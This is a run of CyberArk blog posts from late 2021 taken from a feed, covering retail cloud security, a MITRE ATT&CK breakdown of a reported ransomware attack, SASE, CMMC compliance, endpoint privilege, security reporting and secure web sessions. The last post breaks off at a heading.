Sustained supply chain issues, shipping delays and other current realities have combined to extend the duration of the 2021 holiday shopping season. While retailers work hard to adjust, there’s reason for holiday cheer — according to National Retail Federation estimates, 2021 holiday sales will grow between 8.5% to 10.5% from 2020.

Consumers are shopping eagerly, both in-store and online. To support their customers’ omnichannel shopping experiences, retailers are utilizing operational efficiencies of cloud-hosted eCommerce sites and applications to improve the customer experience. Just a few examples include:

  • Real-time inventory tracking with cloud-hosted databases and applications
  • Personalized shopping experiences with cloud-hosted big data and machine learning services
  • Better eCommerce site performance and availability during peak shopping periods with auto-scaling capabilities in Infrastructure-as-a-Service (IaaS) environments, including serverless functions

Despite these advantages, retailers must remain wary of attackers seeking to capitalize on big shopping holidays, including attempts to gain unauthorized access to cloud-hosted systems. In fact, as the FBI warns of increased scams and fraud, and for retailers embracing the cloud to make the most of this shopping season, security must remain a top priority. According to IBM, the cost of a data breach for retailers increased 62.7% in the last year, with an average cost of $3.27 million.

Cloud-hosted PII Elevates the Risk (and Cost) of an eCommerce Security Breach

No matter where customers transact— in-person or online — many retailers store personally identifiable information (PII) and payment details in the public cloud to drive cost efficiencies for storage and processing. For attackers, this provides major opportunities: one successful attack on the right database or cloud storage system can lead to devastating, far-reaching consequences — from financial loss and legal action to reputational damage and loss of customer trust.

Additionally, since retailers collect credit card information, they are subject to the PCI (Payment Card Industry) Data Security Standards, which compel them to “ensure critical data can only be accessed by authorized personnel, systems and processes must be in place to limit access.” Failing to protect this data, even inadvertently, can expose retailers to fines and other penalties.

Five Common Cyber Weaknesses in Retail

As recent data shows, data breaches are increasingly common in the retail industry. And risk factors can easily compound in dynamic cloud environments, while rapid introduction of new cloud provider services can accelerate the potential for security mistakes and misconfigurations. Some of the most common weaknesses that can be exploited in the retail space include:

  • Excessive PII access from misconfigured entitlements. The rapidly changing nature of the cloud means that resources are often configured to grant human and machine identities excessive access. Attackers and malicious insiders can exploit identities with excessive permissions to reach critical cloud infrastructure, steal or alter sensitive data or interrupt cloud-hosted services. The principle of least privilege access is key here — all identities should have only the bare minimum necessary permissions to perform their intended functions.
  • Event-driven scaling during holiday shopping peaks. Many retailers utilize serverless functions for event-driven eCommerce site architectures, triggering scaling processes in times of peak demand such as Black Friday or Cyber Monday. This rapid scaling can minimize website latency and optimize customer shopping experiences. But serverless functions can also be notoriously powerful in the hands of an attacker. For this very reason, implementing least privilege is critical for all serverless functions across all major public cloud providers.
  • Gaps in internal Identity and Access Management (IAM) enforcement. If an unprotected workforce identity with sensitive access to cloud resources is compromised, an attacker can gain access to those resources. In addition to enforcing least privilege across systems, enforcing multi-factor authentication for all employee access to a cloud environment can provide an extra layer of security by reducing risk of credential theft.
  • Hard-coded application secrets. Modern eCommerce applications are the result of complex interactions between machine identities. eCommerce sites build on top of one another, integrating with payment services such as Paypal, Affirm or Klarna. When building their eCommerce applications, developers can sometimes leave secrets (credentials, passwords, keys and tokens) embedded in their code, exposing them to potential attackers. Throughout DevOps pipelines and eCommerce software supply chains, all hardcoded secrets should be securely managed and programmatically rotated to reduce the risk of compromise.
  • eCommerce website vulnerabilities. Attackers also look for easy ways to exploit common vulnerabilities within eCommerce sites. Without the right layers of security in place, retailers are vulnerable to attacks such as Distributed Denial of Service (DDoS), SQL injection and e-skimming — all of which can disrupt business and potentially give attackers access to valuable customer data. Retailers should follow Center for Internet Security (CIS) best practices to mitigate these risks.

Steps to Secure the Cloud and Minimize Holiday eCommerce Disruption

Fortunately, there are established controls that can help retailers strengthen the security of their cloud environments this holiday season. Check out the eBook “Retail and eCommerce: Securing Your Brand and Locking in Consumer Confidence” to explore best practices. You’ll also discover how your retail organization can “unwrap” new operational advantages and drive secure, rapid cloud expansion with unified Identity Security.

 

]]>
How to Use the MITRE ATT&CK Framework to Fight Ransomware Attacks https://www.cyberark.com/blog/how-to-use-the-mitre-attck-framework-to-fight-ransomware-attacks/ Mon, 22 Nov 2021 17:00:22 +0000 https://www.cyberark.com/?p=124911 Use the MITRE ATT&CK Framework to Fight Ransomware Attacks

Chinese military general Sun Tzu’s treatise The Art of War has been cited over the years by millions of self-help gurus and corporate strategy consultants – and misquoted in a million more PowerPoint slides. It’s beyond cliché at this point, but indulge us for a moment, because some things become cliché because they never cease to be relevant. Sun Tzu claimed that “all warfare is based on deception,” a truism that speaks as much to 5th century battlefields as it does to 21st century cybersecurity. And while we think of malicious agents sneaking around the shadows of the cyber world waiting to strike as soon as a flaw reveals itself, defenders must be equally trained in cunning and deception.

This thinking underpins the popular “MITRE ATT&CK™” framework. Short for “Adversarial Tactics, Techniques and Common Knowledge,” this agnostic database categorizes known adversarial tactics and techniques to help cybersecurity teams, threat hunters and Red Teamers keep tabs on how attackers think and operate. This information can help organizations prioritize mitigation strategies and controls, recover from breaches faster and sometimes even trick foes into trapping themselves.

When our own white hat hacker and CyberArk Global Sales Engineer Len Noe talks through such attack scenarios, he sounds a bit like he’s channeling Sun Tzu himself, dropping aphoristic nuggets such as “cyber attacks aren’t singular events, but an accumulation of steps” or “you can’t hack what isn’t there.”

With Noe providing occasional guidance, we’re putting the MITRE ATT&CK framework to work by examining some of the specific tactics and techniques reportedly used in a high-profile 2021 ransomware attack on one of the largest fuel pipelines in the United States. Based on publicly reported information on the attack, Noe’s full analysis can be seen in this on-demand Attack & Defend guided experience.

Understanding what has been done before can help organizations better prepare for the next way in, or the newest means of attack. Because, as Noe puts it, “You need to address the technique, not the tool.”

Using the MITRE ATT&CK Framework to Deconstruct a Real-World Ransomware Attack

ATTACK PHASE 1 – RECON

During this initial phase, the attacker combed through publicly available information about its intended target and launched a Metasploit listener to keep an ear on incoming connections. The attackers employed simple phishing techniques, such as a fake email from the organization’s IT admin requesting an update requesting that the user upgrade their version of PuTTY. This “upgrade” was infected with a malicious payload generator, MSFvenom, which created a “call home” between the targeted machine and the attacker.

ATTACK PHASE 2 – INITIAL ACCESS

From there, the threat actors navigated to the user’s desktop and uploaded an “AD Recon” tool to get a lay of the Active Directory land, and better understand the company’s internal infrastructure. After running some advanced data recon reports and exfiltrating the necessary information, the attackers removed traces of their activity to avoid discovery.

In this particular scenario, the attackers used several different MITRE-defined techniques to gain an initial foothold:  They abused access to valid accounts gained through social engineering and other techniques; they engaged in active phishing campaigns targeting credentials to compromise identities and gain more access; and they exploited public-facing applications.

ATTACK PHASE 3 – EXECUTION

Once the initial foothold was established, attackers dug through output directories to gain information about the location of the domain controller, along with its IP address and hostname.

The domain controller is the crown jewel for attackers and if not secured properly, unauthorized access can be devastating for an organization. Attackers can exploit vulnerabilities in Kerberos, the default authentication protocol for Microsoft Windows, to pose as a legitimate user, traverse a network undetected, navigate from host to host to steal data, spread ransomware or wreak havoc in any number of ways.

With access to the domain controller, it was very simple for these attackers to run a built-in tool to set up dual sessions — essentially setting their own computer up in parallel to the system admin.

As Noe points out, securing Kerberos implementation programs is critical for keeping unauthorized users from gaining access and executing devastating attacks such as “golden ticket” and “pass-the-hash.” It goes back to the importance of an “assume-breach” mentality.

ATTACK PHASE 4 – PERSISTENCE

Patience and persistence are often seen as virtues, but they are also key to ransomware attacks. Once the attackers established that parallel admin, they used malicious agents to create a scheduled task that – when live –  automatically reached back out to the command and control server and kept the attacker’s portal back to that host open.

From there, they were able to run exploits and hashdumps – essentially a glut of information that can be rendered readable by a program like Hashcat. Once that information was readable and sort-able – which takes time and, well, persistence – the attacker was able to locate admin passwords critical to the mission.

It’s here that Noe advises some sort of automatically re-generated password system, to avoid having one set of keys to unlock a system, as well as to help prevent against re-used or replicated passwords across systems. Again, it’s about limiting lateral and upward movement as much as possible.

ATTACK PHASE 5 – ESCALATION

The name of the game is almost always privilege escalation. Attackers kept cracking open hashdumps and pulling out credentials in an attempt to navigate around the system. They performed various types of credential-oriented operations and ultimately, used this elevated access to navigate to where they wanted to dump – or, more accurately, upload – their ransomware payload.

ATTACK PHASE 6 – EVASION

As Noe says, “After initial access, an attacker’s second priority is defense evasion. The ability to remain undetected is critical.” This is where things get a little Spy vs. Spy – the compromised system (hopefully) has some covert defense mechanisms, while the adversaries try their best to sneak around. For example, to keep things “clean,” attackers will remove output directories, CSV files (Comma-separated values) and powerscripts to eliminate any indications of compromise. These evasive techniques highlight the necessity of a layered, defense-in-depth approach to ransomware protection, Noe points out.

ATTACK PHASE 7 – CREDENTIAL ACCESS

This ransomware attack, like so many others before it, went far beyond desktop mirroring and hashdump-diving for passwords. It targeted privileged credentials that gave the adversary far-reaching administrative access to sensitive data and systems.

This is why, Noe stresses, privileged access management controls that grant users the minimum set of rights are an essential part of that layered security approach — and contribute to the broader “trust nothing, verify everything” Zero Trust philosophy.

The Next Big Attack Probably Won’t Look Like This

While the MITRE ATT&CK framework is indeed useful, it has to be a fluid resource — a starting point. Attackers are constantly innovating, and each attack follows its own path. There’s a constant stream of new techniques emerging in the wild — from biohacking to ransomware-as-a-service innovations, but also the occasional return of old tricks, too. As Noe explains, “We’re seeing brand new ways of zipping files that include Javascript that executes when you unzip. We’ve seen that before, but it’s been a long time since attackers have gone after compression this way.”

So in the words of our cybersecurity philosopher Len Noe, being proactive, being creative and thinking like an attacker are necessary approaches to cybersecurity. But, it’s how we balance tackling the knowns and preparing for the unknowns that will not only help win battles against attackers, it could just help win the war.

]]>
What is SASE and How Does it Relate to Zero Trust? https://www.cyberark.com/blog/what-is-sase-and-how-does-it-relate-to-zero-trust/ Thu, 18 Nov 2021 14:00:00 +0000 https://www.cyberark.com/?p=124773 What is SASE

The days of an on-premises data center being at, well, the center of a defined corporate IT universe, are far behind us. And as organizations continue to shift resources to the cloud, embrace SaaS applications and implement endpoint protection strategies to support highly distributed work models, Zero Trust has become imperative.

The Zero Trust principal of “never trust, always verify” dovetails with another popular technology trend: Secure Access Service Edge or SASE (pronounced “sassy”) for short. This model combines various networking and security techniques to shift controls to the “edge” — in other words, closer to individual users and their devices, no matter where they are in the world.

Here’s a high-level look at what SASE is and how it complements a Zero Trust approach to security.

What is SASE?

Initially introduced by Gartner, SASE is a framework that combines software-defined wide area networking (SD-WAN) elements with various network security capabilities such as firewalls, secure web gateways (SWGs), cloud access security brokers (CASBs) and Zero Trust access controls — and delivers them as a managed cloud service.

Combining the power of these various technologies, SASE shifts the center of connectivity and security away from the on-premises data center. Instead of simply placing one firewall around a network perimeter, it places various controls around applications, servers and other resources — representing the next step in micro-segmentation. Meanwhile, SASE helps network and cloud architects build a secure bridge between access points and the service edge. While traditional networking approaches created inherent security gaps, SASE focuses on consistent coverage across global, distributed workforces.

Why is SASE important now?

In today’s digital organizations, remote workers, vendors and partners all require secure, uninterrupted access to data, applications and services anytime, and from anywhere. Meanwhile, workloads are running as infrastructure as code, SaaS application usage is surging, and user traffic is flowing from numerous locations to numerous cloud services far beyond the company data center.

Organizations need to securely connect all these identities — users, devices and applications — to corporate systems and data, while maintaining full visibility across these distributed connection points. By managing various technology components in a centralized fashion, SASE provides a structured way to accomplish these goals.

So where does Zero Trust fit in here?

Think of it this way: SASE represents a consolidated architecture and way for organizations to streamline operational aspects of managing technology and infrastructure. This can help them save money, reduce complexity and boost flexibility and performance.

SASE makes it easier to enforce Zero Trust and consistently apply role-based, identity-centric controls and granular policies for data movement across the entire network.

A holistic, strategic approach to cybersecurity combines the principals of SASE and Zero Trust, along with other powerful security solutions that place identity — not the data center — at the center of the security equation.

The CyberArk Identity Security Platform is foundational to achieving Zero Trust. Our approach focuses on securing individual identities throughout the cycle of accessing critical assets. This means authenticating that identity accurately, authorizing that identity with the proper permissions, and providing access for that identity to privileged assets in a structured manner – all in a way that can be audited (or accounted for) to ensure the entire process is sound.

 

]]>
Breaking Down the CMMC and How CyberArk Can Help Support Compliance https://www.cyberark.com/blog/breaking-down-the-cmmc-and-how-cyberark-can-help-support-compliance/ Tue, 16 Nov 2021 14:00:01 +0000 https://www.cyberark.com/?p=124540 Breaking Down the CMMC

As mobile workforces and cloud service usage continue to surge, organizations are struggling to provide secure, authorized access to their most sensitive information while keeping it out of the wrong hands.

This cybersecurity challenge is even more pronounced for the 300,000 companies supplying the U.S. Department of Defense (DoD) because theft of information could damage the U.S. economy, undermine technical advantages and even threaten national security. These organizations need to know exactly who is accessing and sharing confidential data, while balancing availability with security. And their ability to do this effectively is precisely what the Cybersecurity Maturity Model Certification, or CMMC, aims to measure.

Here’s a brief breakdown of what the CMMC is as of today and why it matters. It’s important to note that the DoD is currently making some changes to the program structure and requirements, so keep an eye out for additional updates. In this post, you’ll also explore how CyberArk can help organizations implement essential security controls for privileged and administrative identities to meet current CMMC requirements.

What is the CMMC?

CMMC is a model detailing cybersecurity best practices and processes from several security frameworks, including standards from the National Institute of Standards and Technology (NIST). It was established to protect two key types of unclassified information disseminating throughout the Defense Industrial Base (DIB) and the DoD supply chain:

  1. Federal Contract Information (FCI): “Information provided by or generated for the government under contract not intended for public release,” as defined by the DoD.
  2. Controlled Unclassified Information (CUI): “Information that requires safeguarding of dissemination controls pursuant to and consistent with laws, regulations and government-wide policies,” as defined by the DoD.

Why is the CMMC so important?

CMMC represents a major move from self-certification to formal certification by an approved assessor to analyze an organization and assign a maturity level based on the state of its cybersecurity program. Any organization wishing to participate in the DoD supply chain must adhere to CMMC requirements at some level.

What’s included in the CMMC?

The CMMC includes 17 domains broken down into five maturity levels and 171 cybersecurity best practices (75 technical and 96 non-technical controls), aligned with a set of capabilities. This breakdown formalizes cybersecurity activities within organizations, so they are both consistent and repeatable. The CMMC provides a certification that ensures organizations implement these required processes and practices. To meet certification requirements, organizations must meet a cumulative set of processes and practices. In other words, to advance to the next level of certification, an organization first must demonstrate proficiency in processes and practices at lower levels.

To whom does CMMC apply?

All DoD defense contractors, including prime and subcontractors, that handle CUI/FCI data are required to Commercial Off-the-Shelf (COTS) technology is out of scope unless a system manages, stores, transmits, collects, releases and/or supports CUI/FCI data in some capacity.

DIB contractors can seek CMMC certification for an entire enterprise or for only one or more segments of the enterprise, depending on where and how securely they store the information. To qualify for certification, organizations must provide proof of institutionalization of processes. They also must show that they have implemented the practices to support those processes.

What are the five levels of the CMMC?

The CMMC domains are mapped across five levels of security controls, as shown below. To reach Level 1, organizations must follow a set of defined practices, including implementing 10 specific technical security controls covering basic cyber hygiene fundamentals. To reach Level 3 or above, organizations must prove the maturity of a process and provide documented evidence. To achieve the highest level of information protection (Level 5), organizations must implement a total of 75 technical controls across areas including risk management, access control and identification and authentication. They must also demonstrate how these practices are standardized across the organization.

CMMC Five Levels of Security Controls

How can CyberArk support organizations in achieving CMMC compliance?

The CyberArk Identity Security Platform helps federal government agencies meet today’s challenging security and compliance requirements. Our toolset — including DoD UC APL-certified CyberArk Privileged Access Manager — provides organizations a jumpstart to CMMC compliance through:

  • Policy enforcement and audit trails based on defined roles
  • Integrations with many other tools for a holistic access solution
  • Professional services and training that can help to further mature the CMMC program
  • A robust CyberArk partner network for integrations
  • Integrations with what an organization has in place
  • The ability to address risk management, domain administration, firewalls, vulnerability management, credentials and endpoint management

Which of the CMMC technical controls can CyberArk address?

In total, the CMMC has 75 technical controls (the 96 non-technical controls are a mix of administrative tasks, policies and procedures).

The CyberArk solution satisfies 41 of the technical controls needed for the CMMC levels. Through integrations with other security tools offered by our partner network, CyberArk can help organizations meet the remaining 34 technical controls.

On the journey toward CMMC compliance, CyberArk can help your organization effectively and efficiently meet process and practice requirements to protect information through comprehensive Identity Security controls. Visit here for a detailed analysis of the ways in which CyberArk can support compliance with CMMC requirements. You’ll find an at-a-glance view of individual requirements mapped to each CMMC level, the specific type of support provided and whether the solution is supplied directly through CyberArk solutions or with the involvement of third-party partnerships.

]]>
What a 100-Year Plant Disease Reveals About Endpoint Privilege Security https://www.cyberark.com/blog/what-a-100-year-plant-disease-reveals-about-endpoint-privilege-security/ Tue, 09 Nov 2021 14:00:20 +0000 https://www.cyberark.com/?p=124521 Plant Disease Reveals About Endpoint Privilege Security

At the turn of the 20th century, a little-known plant disease called white pine blister rust emerged in the United States and began rapidly ravaging entire forests. As the disease spread across the country, the government stepped in to protect the flailing timber industry by banning the growth and sale of gooseberries and currants — two innocent-looking culprits behind the outbreak.

As hosts, these berry plants carried the disease without being harmed themselves, essentially serving as a launchpad for the virus. The idea was that by eliminating these two plants, white pine blister rust could no longer reproduce and infect more vulnerable pine trees. But in the process, people missed out on two very popular (at the time) summertime fruits, along with their numerous health benefits. (Fun fact: the black currant is a nutritional superstar that delivers 4x as much vitamin C as oranges!) Luckily, the ban was lifted in the 1960s, and new varieties of rust-immune gooseberries and currants were developed, much to the delight of pie lovers across America.

Now you’re probably thinking, what does tree fungus have to do with cybersecurity? Stay with us here…

Cyber intruders typically follow a sequential set of steps to execute their attacks. While there are many methods they can use to jump start their efforts, compromising identities and abusing privileged credentials is an especially productive tactic.

A Windows Defender Application Control (WDAC) vulnerability that recently came to light illustrates the efficacy of this approach. An attacker can exploit this particular flaw (CVE-2020-0951), execute commands on the endpoint and bypass the WDAC system, which is meant to block malicious software from running. But first, the adversary must gain privileged access to launch the attack — underscoring the critical need to enforce privilege security on the endpoint.

While most organizations today recognize this well-worn “privileged pathway,” privileged accounts exist everywhere within an organization. In fact, many privileged credentials are hardcoded or embedded enterprise software, systems and servers. Since privileged accounts can’t be completely eradicated, and are very much needed to support a healthy IT ecosystem, how can they peacefully co-exist in environments that are constantly at risk of threats like ransomware infection that originate on the endpoint?

Organizations can take a page from the white pine blister rust eradication playbook and apply similar logic used by mid-century forest and agriculture experts to:

  • Securely manage “host” gooseberry and currant plants (or, in our case, privileged local admin accounts), making it difficult for the rust (or attacker) to hopscotch its way into a susceptible white pine (or IT network), while enforcing granular least privilege policies for IT administrators who have powerful access.
  • Remove new berry plant species’ ability to “carry” the virus. In the digital realm, this equates to removing administrative rights from regular user accounts. This is one of the most effective ways to reduce your endpoint attack surface. If end-users require elevated privileges to perform certain approved tasks like updating Windows or changing their laptop’s power settings, automated just-in-time privilege elevation can automatically give them the privileges they need for a certain period — and take them away as soon as the task is complete.
  • Carefully monitor for additional species that could threaten the forest — and test them before they can grow and spread. In our enterprise analogy, if an end-user launches an application on their laptop that’s legacy, unknown or unapproved by the organization, the ability to rapidly analyze the application’s risk level can help identify, block and contain attacks on the endpoint — all without hindering end-user productivity or burdening IT help desk teams.
  • Promote tree health and growth by bringing in experienced arborists and their tools to address issues (or common attack vectors, such browsers containing saved passwords or known bad or “blacklisted” applications) putting the tree (or business) at risk, prune the dead wood (such as removing excess entitlements) and help all the tree’s living parts (or users) work together productively in a safe and controlled manner.

By following these simple yet effective steps as part of a defense-in-depth approach, your organization can significantly reduce the risk of ransomware and other endpoint attacks without introducing user friction. In other words, you can have that gooseberry pie and eat it too!

Speaking of tools that can help keep your endpoints secure — from servers, to workstations, to laptops — check out CyberArk Endpoint Privilege Manager. Request a 30-day trial of our fully SaaS solution and you can start strengthening your security posture on day one.

]]>
Why Reporting Cybersecurity Business Impact is About Seeing the Forest from the Trees https://www.cyberark.com/blog/why-reporting-cybersecurity-business-impact-is-about-seeing-the-forest-from-the-trees/ Fri, 05 Nov 2021 13:00:01 +0000 https://www.cyberark.com/?p=124460 Reporting Cybersecurity Business Impact

You know when you get stuck sitting next to that one relative who takes forever to tell a story or get to the punchline of a joke? Executive board meetings and quarterly updates sometimes go this way. With so many metrics to share, cybersecurity program leads can easily get bogged down in the technical details — leaving company stakeholders or steering committees glassy eyed, or worse, questioning the program’s efficacy altogether.

Cybersecurity leaders must come to the table with a powerful, yet succinct, reporting framework and dataset to build a compelling case and continuously justify their programs. But this requires a shift in perspective — because you can’t see the forest if you’re stuck in the trees.

Zooming Out on the Forest Starts with the Right Framework

Despite constant and evolving digital threats, cybersecurity programs are too often viewed as a black hole: money goes in but doesn’t come out, as they’re not traditional revenue-generating parts of the business. This makes it even more important for Identity and Access Management (IAM) and other security program leads to demonstrate their program’s value within the broader business context — either in quantitative terms of dollars and cents or through a compelling qualitative storytelling approach.

Fortunately, the solution is something cybersecurity professionals are already well-accustomed to using: a reporting framework.

Every company’s reporting framework will look a bit different — after all, your organization has a unique set of goals and requirements. But there are several common foundational elements that should be incorporated into any reporting architecture to help demonstrate program health and overall value.

The first? Defining what overall program success means to your organization. Do this by asking three important questions:

1. Who are we?

2. What are the business initiatives and goals that motivate us?

3. Why do we pursue those goals?

Your answers to these questions reveal what your business prioritizes and why. The next step is to dive deeper, defining the milestones and metrics that matter most:

4. Define the milestones or smaller objectives and outcomes related to the workstream, system or process encompassed by the program’s roadmap.

5. Map each milestone directly to the workstream, system or process you’re planning to secure. For instance, if a key program objective is to mitigate the risk of a complete cloud takeover, then you would want to measure things such as number of admin and privileged roles secured by single sign-on (SSO), multi-factor authentication (MFA) and session protection controls, along with the number of accounts and access keys secured by Privileged Access Management (PAM) controls.

Here’s a look at what this approach could look like in action:

Cybersecurity Reporting Framework

The Right Reports for the Right Stakeholders

We’re starting to shift our focus onto the forest now, but there’s still work to do. Every company has stakeholders at various levels within the organization who will need to be briefed. Their role determines the nature of the metrics in your report: those closest to the security team will be interested in the nitty gritty — the individual trees. But the higher up the ladder you go, the broader you must zoom. For example, this cybersecurity veteran uses a one-page “placemat” when reporting to executives. In his words, “If we can’t tell some of the most senior executives within the organization how we’re doing and what the situation is or where they need to help on one page, we don’t deserve to be in this role.”

At most companies, IAM leaders typically report security metrics to four key audiences at regular intervals. Here are some guidelines on how to customize your reports for each level:

Director or vice president of identity (or similar role): With this stakeholder, you’ll typically focus on the individual “trees” — the data for specific metrics and milestones — on a regular basis. Reporting typically occurs monthly, or at least quarterly, and will play a critical role later when it’s time to make board-level reports.

Steering committee: With this group made up of IT and security leaders, project managers and other stakeholders, you’ll cover the same metrics and milestones but will also move up a level to discuss goals and report on blockers or issues related to your security initiatives. These meetings typically happen once or twice each quarter.

Strategic business review by IAM stakeholders: Now you’ll be briefing IAM leaders, lead engineers and key stakeholders, as well as security vendors and partners. In addition to giving reports to the steering committee, you’ll describe how to push forward to help reach the company’s desired business goals and outcomes. These briefings are typically held quarterly or semi-annually.

C-level executives and the Board: This is when the whole forest comes into full focus, and the reports for your director or vice present become part of a presentation given by the CISO or CIO. The board will want to know the overall state of security affairs and how the work you’ve done to achieve your goals impacts the business — as well as what the return on their security investment has been. Board meetings are usually annual or semi-annual affairs.

Notice how in this progression you’ll move gradually from discussing trees in the beginning to presenting the forest in the end. The reporting framework you develop returns its dividends in the form of informed stakeholders and supportive leadership.

Now You’re Flying Above the Treetops

Gaining perspective on the entire forest means realizing it’s more than just the trees. That knowledge enables more transparent, effective reporting and communication across all lines and levels of business.

So where can you go from here?

  • Don’t let the scope of this undertaking daunt you. Yes, the forest is big, but a conscious shift in perspective goes a long way in refocusing efforts.
  • If you aren’t already doing so, start developing your own reporting processes, set review cadences and drive your programs forward with the data you collect from these.
  • Dig into the CyberArk Blueprint for Identity Security Success to help guide your roadmap and set major goals and milestones.
  • Check out the eBook Securing Success: Reporting PAM Wins, which discusses how to define a PAM risk mitigation strategy, designing effective frameworks, and executing your reporting strategy.
]]>
Unmask Insider Threats and Errors – Regain Security Control https://www.cyberark.com/blog/unmask-insider-threats-and-errors-and-regain-security-control-with-cyberark-identity-secure-web-sessions/ Tue, 02 Nov 2021 13:19:58 +0000 https://www.cyberark.com/?p=124408

Employees across finance, sales, HR, marketing and virtually every other business department need access to web applications to do their jobs. In fact, new CyberArk research found that in a majority of organizations (70%), a typical business user has access to more than 10 business applications, many of which contain high-value data such as financial records, customer information and intellectual property.

So what happens when an insider uses this legitimate access to obtain confidential data or change something he shouldn’t? Eighty percent of organizations have been in this position — forcing security teams to race against the clock to find out what happened.

In most cases, insider misuse or abuse of application access is unintentional. But making a fast, informed determination between an honest mistake and risky behavior is easier said than done. Investigating user activity takes a trifecta of time, resources and tools — things security and compliance teams don’t always have. And since built-in security controls vary wildly between applications, security teams struggle to consistently enforce strong controls across hybrid IT environments.

SWS Web Application Statistics

CyberArk Identity Secure Web Sessions, the newest addition to our Software-as-a-Service (SaaS) portfolio, helps security and compliance teams unmask and address insider threats and errors quickly by adding extra layers of security to web application sessions. Here’s a look at three real-world industry examples of Secure Web Sessions in action.

Protecting business-critical applications from insider errors and abuse at a high-growth tech firm

Like many organizations, tech companies often struggle to maintain visibility across their fast-growing, highly distributed employee bases. This makes it difficult to understand which end-users are accessing business-critical web applications, when they’re accessing them, and for what purposes.

For example, if someone in the finance department with elevated access rights made a mistake when using a payroll system that led to unauthorized payroll changes, the team would have to sift through thousands of lines of logs and recreate every step the user took to understand what happened.

With CyberArk Identity Secure Web Sessions, these teams could see exactly what happened in that web session and easily trace unauthorized configuration changes within a protected app down to a click. It also makes it easy to search any recorded session for specific keywords or actions to further focus and accelerate the investigation.

Safeguarding sensitive financial data on the trading floor with continuous authentication 

Stock traders use multiple devices and applications on trading room floors to save time and gain deeper insights into pricing fluctuations, market data and other critical information. They’re also constantly moving around – not often tied to a desk. It’s easy to imagine a scenario in which a trader steps away from a device during an in-progress web session, inadvertently exposing sensitive information to data loss, fraud or abuse.

In this scenario, CyberArk Identity Secure Web Sessions could help to protect sensitive financial data from unauthorized access by monitoring the trader’s web application usage. If and when they walk away from an open highly-sensitive session, Secure Web Sessions will automatically log them out and prompt re-authentication. Meanwhile session recording and attribution help drive greater accountability.

Continuously verifying that the person who initiated the web session is the same one using the application is an authentication challenge shared by organizations across industries. Nearly 41% of all organizations said that better visibility into user activity would enable them to identify the source of a security incident more quickly, while 38% said it would help them provide more comprehensive reporting to auditors.

Securing patient medical records by restricting data copying and downloading

Doctors and nurses regularly update various patient records throughout the day, while connecting with a host of other IoT devices that record data from heart rates to prescription dosages. Ransomware and other malicious actors are zeroing in these devices, hoping to infiltrate them and progress their attacks toward target systems and sensitive PII.

According to our research, 43% of healthcare providers lack the ability to monitor and audit most of their business apps that contain high-value data. With CyberArk Secure Web Session, healthcare organizations and hospitals can further protect their applications, patient data and users with application-specific session protection. Secure Web Sessions adds local hardening layers to the sensitive web session, protecting it from dangerous actions. Optional integration with CyberArk Endpoint Privilege Manager helps to prevent access from malicious processes, even if running on the user’s endpoint device. Doctors and nurses can continue to safely access protected applications — while admins can know that their session and customer patient data is secured.

Previously, the only way to achieve a similar protection was to configure each application to use streamed browser sessions, a process difficult to scale that often results in dangerous latency issues. Since all protections and recordings run transparently in the background, healthcare providers can enjoy a secure, frictionless user experience and stay focused on what matters most: delivering the highest level of patient care.

Secure High-Risk User Activity with CyberArk Identity Secure Web Sessions

Secure Web Sessions is an add-on capability to CyberArk Identity Single Sign-On and serves as an authentication factor for accessing protected web applications. Request a free 30-day trial and discover the many benefits of simplified, context-aware session recording, auditing and protection for the applications powering your business.

To dig into more details and features, read today’s press release or browse the solution brief.

]]>
What Squid Game Reminds Us About Cybersecurity https://www.cyberark.com/blog/what-squid-game-reminds-us-about-cybersecurity/ Thu, 28 Oct 2021 13:55:37 +0000 https://www.cyberark.com/?p=124296 What Squid Game Reminds Us About Cybersecurity

This Halloween, you’re likely to see a lot of green tracksuits, thanks to the pop culture juggernaut that is Netflix’s Squid Game. In case you’re still, somehow, in the dark, the South Korean television series is like a mix of Hunger Games and The Running Man, as it follows a desperate group of people lured into playing deadly versions of children’s games like “Red Light, Green Light” and “Tug-of-War” for a slowly increasing pot of money that swells into the billions.

For those in the cybersecurity community, seeing the concept of “survival of the fittest” put through the ringer in such brutal ways strikes a particularly familiar chord (the show itself has even had its own data exposure problems). The climactic (and titular) “squid game” involves one person, the “defender,” trying to prevent another, the “attacker,” from passing through a narrow entry point before they can reach their end goal. Could there be a cybersecurity metaphor more on the nose?

So, in honor of one of the bloodiest, most intense shows you’ll likely watch this Halloween season (take note Michael), here are some cybersecurity takeaways from Squid Game and its varied games. (Spoiler alert: If you haven’t seen the show, you may not want to read past this line until you do.)

“Red Light, Green Light” and the Importance of Permission and Privilege

It’s a schoolyard classic — one player stands with their back to the others and says, “green light,” prompting players to traverse as much ground toward a designated finish line as possible. Upon hearing the “red light” cue, everyone must freeze. The show takes this innocent game to a deadly level, as a (super creepy) robot doll scans players for even the slightest hint of movement, then sets off computer-guided guns to eliminate the disqualified — for good.

Today’s organizations can assume that at least one “player” in their network is inching forward without permission. By enforcing “red lights” and continuously validating the need for individual identities to have access to data and resources, security teams are in a better position to stop attackers from escalating privileges and reaching the finish line to accomplish their goal.

“Dalgona” and Working Smarter Not Harder Against Cyber Threats

In one of Squid Game’s most intense sequences, participants are given dalgona, a common Korean street treat (also known as Ppopgi, which is basically a very brittle candy made of brown sugar and baking soda). Street vendors will impress simple shapes into them, like stars or circles, and ask children to break out the shape without cracking it, which is very difficult to do. In the show, some characters are given triangles, while others are stuck with more complicated shapes, such as umbrellas.

Just like dalgona, cybersecurity systems should be built to slow attackers down: throw in some jagged edges or looped curves like an umbrella handle — anything to add layers of difficulty that inhibit an attacker’s progress and raise red flags faster. These systems should also incorporate ways to automate and simplify security processes. Squid Game’s protagonist Seong Gi-Hun offers a valuable strategy here. By licking the back of the honeycomb candy, he can melt the shape out rather than try to crack it — much like how threat detection and analytics capabilities can speed the process of finding and blocking threat actors to limit, or even prevent, damage.

“Tug Of War” and the Need for Security-Productivity Balance

We’ve all likely played this one. Teams on either end of a long rope try to pull one another over a designated “out of bounds” area. This game of “survival of the fittest” closely mirrors the constantly back-and-forth struggle between attackers and defenders.

Security teams face their own constant tug of war between two directly opposing, yet equally important, needs: one side pulling for stronger security measures to protect the business, the other pulling to speed rollouts and boost user productivity. The only way to win is to act intelligently, not aggressively. “Wins” can be achieved on both sides if  Zero Trust measures are adopted across the entire “game” or cycle of accessing critical assets. That’s where Identity Security solutions come in. For instance, contextual authentication methods can help verify every user is who they claim to be — without making users jump through lots of hoops. And by granting proper permissions the second they’re needed (and taking them away the second they’re not), organizations can more intelligently implement least privilege controls, finally ending the back-and-forth stalemate between security and productivity.

“Marbles” and the Power of (Zero) Trust

